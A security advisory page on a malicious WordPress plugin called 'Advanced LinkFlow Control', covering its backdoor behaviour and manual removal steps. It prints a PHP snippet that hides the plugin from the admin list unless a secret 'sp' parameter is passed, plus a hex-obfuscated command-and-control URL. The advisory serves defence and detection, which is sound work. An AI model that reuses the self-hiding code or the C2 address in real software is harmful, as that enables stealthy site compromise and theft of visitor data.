Skip to content

Malware advisory · High severity

Advanced LinkFlow Control

If you discovered the "Advanced LinkFlow Control" plugin in your WordPress files, your site is infected with a stealth backdoor. This malware hides itself from the admin dashboard, clears cache plugins to persist, and secretly exfiltrates visitor data to a remote server. You must delete the advanced-linkflow-control folder immediately.

Behavior and purpose

Disguises itself as a utility plugin, hides from the WordPress admin list, and acts as a backdoor to exfiltrate visitor data (IPs, User Agents). It also clears caching plugins to persist injected SEO spam and cloaks content from search engines.

Defensive removal notes

  1. Access your server’s file system via FTP or File Manager.
  2.  Navigate to `wp-content/plugins/`.
  3.  Locate and completely delete the `advanced-linkflow-control` folder to eliminate the backdoor.
  4. Verify the removal by ensuring no related active processes remain and checking your `wp-options` for any leftover transients.

Observed code indicator

Treat this as an investigation clue, not proof by itself.

add_filter('all_plugins', function ($plugins) {
        if (isset($_GET['sp'])) {
            return $plugins;
        }
        $current = plugin_basename(__FILE__);
        unset($plugins[$current]);
        return $plugins;
    });
    
    // Decoded C2 Server
    private $server_url = "\x68\x74\x74\x70:\x2f/\x77h\x74a\x73f\x64e\x2ei\x63u\x2fg\x65t\x2ep\x68p"; // http://whatsdf.icu/get.php